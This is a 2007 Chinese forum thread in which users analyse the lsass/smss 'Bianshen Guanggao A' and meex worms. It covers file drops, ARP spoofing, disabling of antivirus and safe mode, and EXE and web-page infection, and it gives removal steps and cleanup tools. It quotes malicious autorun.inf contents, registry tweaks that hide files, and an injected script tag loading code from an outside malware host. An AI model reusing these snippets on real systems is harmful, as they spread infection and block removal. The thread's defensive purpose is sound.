变身广告A(smss lsass) 和 meex （最近的病毒好厉害 实在是厉害啊）

fsr717af

补充：如果放错区了 请版主帮忙移动下 我也不知道放哪  感觉这边应该合适的吧  

在windows/system32/com下生成 lsass.exe netcfg.000 netcfg.dll smss.exe
每个盘下创建autorun.inf和pagefile.pif
在进程管理中LSASS.exe SMSS.exe 用户名是Administrator,并且不能被结束(系统提示为关键进程)
自动关闭 360安全卫士,瑞星,卡巴,金山等杀毒软件.
安全模式不能进入
显示隐藏系统保护文件选项 消失
组策略无法运行
msconfig 中出现~.exe

文件名称：lsass.exe\smss.exe
文件长度：94208 byte
依赖平台：Win 9X/ME/NT/2K/XP/2K3
行为分析：
1、释放病毒副本：
%Systemroot%\system32\Com\lsass.exe 94208 字节
%Systemroot%\system32\Com\smss.exe 9365 字节
%Systemroot%\system32\Com\netcfg.dll 40960 字节
2、添加启动文件夹，开机启动：
C:\Documents and Settings\当前用户名\「开始」菜单\程序\启动\~.pif
另外netcfg.dll尝试加载Shellhooks注册表项，但没有实现。
3、调用cacls，本身不判断文件系统（FAT或NTFS），后解除目录Com的权限，设为完全控制。
参数为：C:\winnt\system32\com /e /t /g admin:F
4、连接网络121.11.245.1**（ 广东省惠州市 电信）下载一个ARP病毒
释放到：%Systemroot%\system32\drivers\alg.exe 15181 字节
5、查找硬盘的文件，如名称里有“360”字样则删除。
6、可能会关闭一些窗口：
"ollydbg"
"softice"
"ida"
"asm"
"360"
"木马"
"清除"
..................
7、另外那个仿系统文件的smss.exe，应该和主体lsass.exe是互斥体，也起着进程守护的作用。
8、查找磁盘，生成Auorun.inf和pagefile.pif。
9、跳过C盘，开始感染EXE文件，但并不全部感染。
感染时先把文件加载内存中，提取其图标资源，最后删除原文件，把修改过的文件栲贝回去。
因为这样，所以图标会变模糊，可能是无法读32位的....（知道的大牛请指导下）

PS：运行感染的文件，会释放一个filename.exe.log。但是仍无法执行
用PE工具对比下，基本上文件是报废了，区段被覆盖，DOS头、入口等都发生变化``
10、感染文件时如果发现Zip和Rar格式的，则用Rar自解压命令释放EXE文件，感染后重新打包放回原处！
汗一个....高科技了
11、查找硬盘的htm、html、asp、spx、php、jsp网页文件，插入一段框架代码（16进制加密）
解后得：h**p://js.k0102.com/01.asp。

病毒启动方法为在「开始」菜单\程序\启动中建立一个~.exe的隐藏文件，由此文件引导lsass.exe运行，并嵌入alg.exe，发送ARP欺骗，~.exe在成功引导后自动结束
病毒会修改系统设置，让你无法显示属性为S的系统文件，也无法显示任何隐藏文件，同时修改注册表，让你无法恢复此设置
然后在系统中的C:\WINDOWS\system32\com文件夹下建立病毒文件，名字为lsass.exe，启动后监听后台端口，大概端口范围是1100～1300
同时后台开启IE浏览器，监听1100~1300中某端口，提供病毒更新服务
病毒还会对外发送ARP欺骗数据包，试图感染局域网中的其他机器
同时安装隐蔽软件，金山扫描出来的名字是Broken Safeboot，也就是破坏了安全模式，可见此病毒在安全模式下一样可以运行！（金山清理专家2.1无法修复）
使用金山网镖将lsass.exe进程结束后，后台立即打开IE，下载病毒，并在一段时间后恢复lsass.exe进程
病毒同时阻挡一些与360安全卫士有关的行为，首先，如果系统中开着360安全卫士，会自动退出，如果你试图再次打开360，360同样立即被关闭，同时360的运行文件被删除。这时也许系统中会有360的安装文件，当你运行安装文件后，安装进程同样被结束，同时安装文件被删除！然后当你试图到360的网站上下载360安全卫士时，只要你访问了360网站的任何页面，浏览器会立即被关闭！（此功能由lsass.exe实现，结束此进程后360可正常运行）

技术分析
==========
病毒运行后复制自身到系统目录：
%System%\Com\lsass.exe
同时释放另一个病毒程序用于感染exe文件：
%System%\Com\smss.exe
病毒还向各个磁盘分区复制副本，创建autorun.inf使病毒可通过“自动播放”被运行：
X:\pagefile.pif
X:\AUTORUN.INF

[AutoRun]
open=pagefile.pif
shellexecute=pagefile.pif
shell\Auto\command=pagefile.pif
修改注册表使“隐藏受保护的操作系统文件(推荐)”选项消失：

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"Type"="radio"
感染exe文件，被感染exe文件的前端和后端都有病毒插入。
病毒还会修改htm/html/asp/aspx/php/jsp等网页文件，在文件尾部追加脚本代码：

<script src="hxxp://www.yayadown.com/b.js"></script>
脚本代码利用系统漏洞会下载病毒自身更新。

清除步骤
==========
1. 结束病毒进程：
%System%\Com\lsass.exe
2. 删除病毒文件：
%System%\Com\lsass.exe
%System%\Com\smss.exe
3. 恢复被隐藏的“隐藏受保护的操作系统文件(推荐)”选项：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"Type"="checkbox"
4. 通过磁盘分区盘符右键菜单中的“打开”进入磁盘分区根目录，删除根目录下的病毒文件：
X:\pagefile.pif
X:\AUTORUN.INF
5. 使用反病毒软件进行全盘扫描清除被病毒感染的exe文件
6. 恢复被修改的网页文件，可以使用反病毒软件清除，也可以使用某些网页编辑工具（比如Dreamweaver）替换被添加代码为空

确实是个剧毒啊 现在我们机房每台机子上都有 网管们束手无策啊
生命力超强！！！
此病毒通过 arp+优盘+exe感染 3重传播 非常厉害 解决时这3者必须都要考虑 只装杀软是没有效果的 因为arp本身就是利用协议缺陷

而且 再中毒深入以后 尤其是局域网 打开网页时 在右下角会有一个貌似QQ广告的窗口
一般写着 送什么百万Q币什么的 什么中奖什么的
千万别点啊


现在网上方法很多 总有一种是适用的 希望大家耐心找找！
附上免疫批处理（可能不完善 作者 majsma）
变身广告A免疫.rar (1.3 KB, 下载次数: 137)

2007-12-21 13:21 上传

点击文件名下载附件


另外现在的meex 病毒也貌似很厉害
症状：
瑞星将此病毒报告为：Worm.Win32.AvKiller.az
usbcleaner报告此病毒为worm.pabug.gen
该病毒建立的包括的源文件如下:
病毒文件全路径 大小(字节)
C:/Program Files/meex.exe 36,219
C:/Program Files/Common Files/Microsoft Shared/uboqsgw.inf 169
c:/Program Files/Common Files/Microsoft Shared/hxljjqu.exe 36,219
c:/Program Files/Common Files/System/uboqsgw.inf 169
C:/Program Files/Common Files/System/tkwdmwe.exe 36,219
其它所有分区:/autorun.inf 169
其它所有分区:/ssncpst.exe 36,219
autorun.inf和uboqsgw.inf文件里的内容
[AutoRun]
open=ssncpst.exe
shell/open=打开(^&O)
shell/open/Command=ssncpst.exe
shell/open/Default=1
shell/explore=资源管理器(^&X)
shell/explore/Command=ssncpst.exe
该病毒的后果:
你的杀毒软件会无法打开,另外只要你的文件名中如果是"病毒","杀毒","瑞星"等和病毒.
有关的字眼时,你这个文件打开之后会马上被关闭.网页中一搜索这些字眼也会马上关闭.
可能还有其它的情况,这里就不详细说明了.

附上meex专杀批处理
meex专杀.rar (2.26 KB, 下载次数: 81)

2007-12-21 13:21 上传

点击文件名下载附件


另外 Autorun病毒防御者 都能报这2个毒
但杀不全 还会死而复生 让人心寒  可惜了












补充：(文章来自剑盟 http://www.janmeng.com/html/91/n-2691.html）

Win32.Troj.Downloader.yl.102400
病毒名称(中文):ARP下载者102400
病毒别名:
威胁级别:★★☆☆☆
病毒类型:木马下载器
病毒长度:102400
影响系统:Win9x WinNT
病毒行为:
这是一个具有ARP 欺骗的下载者病毒，在下载病毒到本地运行的同时还生成大量AUTO病毒文件。该病毒还具有具有映象劫持功能，可以对一些安全工具和调试分析软件进行拦截，并不断改写注册表破坏安全安全模式，阻止用户修复系统。
1.病毒运行后，会释放以下文件：
%system32%\Com\SMSS.EXE
%system32%\Com\LSASS.EXE
%system32%\dnsq.dll
%system32%\drivers\alg.exe
%system32%\com\netcfg.dll
%system32%\com\netcfg.000
在每个盘目录下生成自己的副本 pagefile.pif 及 AUTORUN.INF 文件.
2.该病毒会破坏安全模式和禁用了文件选项的显示隐藏文件的选项等恶意操作,使用户无法启动安全模式,并且使隐藏文件无法被显示.由于该病毒是不断修改注册表,也使一些安全工具(金山清理专家等)无法成功修复安全模式.
病毒自己不在注册表创建 RUN,却把RUN 项删的干干净净,使得一些的常用软件,安全工具等,不能开机自启动.
3.该病毒具有映象劫持功能,可以对一些安全工具和调试分析软件进行拦截.会对以下一些安全工具和调试分析软件拦截:
OLLYDBG
IDA
MetaPad
SOFTICE
一些安全软件如 ICESWORD ,360.... 也会被关闭.
4.病毒会将自己拷贝到 %system32%\Com下,更名为 LSASS.EXE,并释放SMSS.EXE 和 ALG.EXE ,最后运行LSASS.EXE, SMSS.EXE 和 ALG.EXE. 由于病毒的进程名和系统的 LSASS,SMSS 进程名相同,使任务管理器无法结束它.
5.该病毒会远程注入 dnsq.dll 到其它进程中,在其它进程中启动一个线程来不断监视病毒的进程是否被关闭.若检测到被关闭,就自动再启动病毒进程. 如果被一些杀毒软件和安全工具阻止创建了,被注入的其它进程就会调用 SYSTEM32 目录下的 SHUTDOWN.EXE 来关闭计算机( ^_^ 病毒作者真是淘气啊! ).
6.病毒会模拟资源管理器的右键菜单,使用户不易察觉病毒被自动运行,当用户利用资源管理器打开分区时,无论是直接运行或右键打开都会运行病毒.
7.该病毒会启动一个 IE 进程来连接站点http://w.c**o.com/r.htm和http://*s.k**02.com/**.asp,并下载恶意脚本执行.
8.该病毒会生成多个组件,并注册为 IE 插件. 它的行为特征属恶意软件,会利用 REGSVR32.EXE 为netcfg.dll 注册多个的CLASSSID, 杀毒软件通常不能清除干净,会有大量残留. 可以使用金山清理专家等软件来清除.
9. %system32%\drivers\alg.exe 是个ARP 病毒,利用 WinPcap 来收发网络包,对整个局域网内的所有IP 进行 ARP 攻击.并在截获的是数据包内插入恶意代码, 该代码会从http://1**.*1.2*5.1*0/setup.exe下载病毒的最新版本到本地运行.使被攻击的局域网内其它用户中毒.



解决病毒思路：
杀掉并抑制再生下列文件：
C:\Windows\system32\Com\smss.exe
C:\Windows\system32\Com\lsass.exe
C:\Windows\system32\drivers\alg.exe
C:\Windows\system32\Com\netcfg.dll
C:\Windows\system32\Com\netcfg.000
C:\Windows\system32\dnsq.dll
X:\AUTORUN.INF
X:\pagefile.pif
(X=C、D、E、F、G、……)
C:\Documents and Settings\当前用户名\「开始」菜单\程序\启动\~.pif
（查看这些文件的方法：用WINRAR查看，直接从我的电脑是看不到的。）
但是如果用PowerRmv.com等工具杀灭的话，当杀掉C:\Windows\system32\Com\lsass.exe时电脑就会自动重启，前功尽弃。

解决病毒方法：
所以，做了以下一个文件，批处理一下，然后重启电脑。
重启后，杀毒软件就可以用了，升级最新的病毒库，全盘扫描，将机子上的病毒杀光光，安装个金山清理专家之类的清理一下。
由于这个病毒大多在校园网里传播，最好再安装个ARP防火墙。

希望对饱受这个破病毒之害的朋友有帮助

ARP下载者病毒专杀.rar (1.27 KB, 下载次数: 76)

2007-12-26 13:06 上传

点击文件名下载附件



再附一个 lsass.exe和smss.exe病毒专杀工具
来自：http://xzhsoft.blog.sohu.com  作者：欣子慧
lsass.exe和smss.exe病毒专杀工具.part1.rar (341.8 KB, 下载次数: 132)

2007-12-26 22:03 上传

点击文件名下载附件
lsass.exe和smss.exe病毒专杀工具.part2.rar (299.61 KB, 下载次数: 95)

2007-12-26 22:03 上传

点击文件名下载附件

[ 本帖最后由 fsr717af 于 2007-12-26 22:03 编辑 ]

yandy

这病毒太厉害了
怎么弄都弄不死它！

jhjk

找到病毒所在位置,可以用冰刃强制删除!

冰泉

帮过5~6个女生杀过这个毒了，先用auto专杀重启杀了autorun.inf，然后不用进去任何盘，从运行里面运行winrar并把每个盘的病毒文件清除了（这个病毒只感染每个盘根目录下的.exe文件，在文件夹里面的不会感染，不放心的话可以将所有可以替换的exe文件替换了）
最后就是用sreng修复注册表

娃娃鱼儿

这个有没有专杀出来啊，或者哪个大下有没有什么确定的方法呢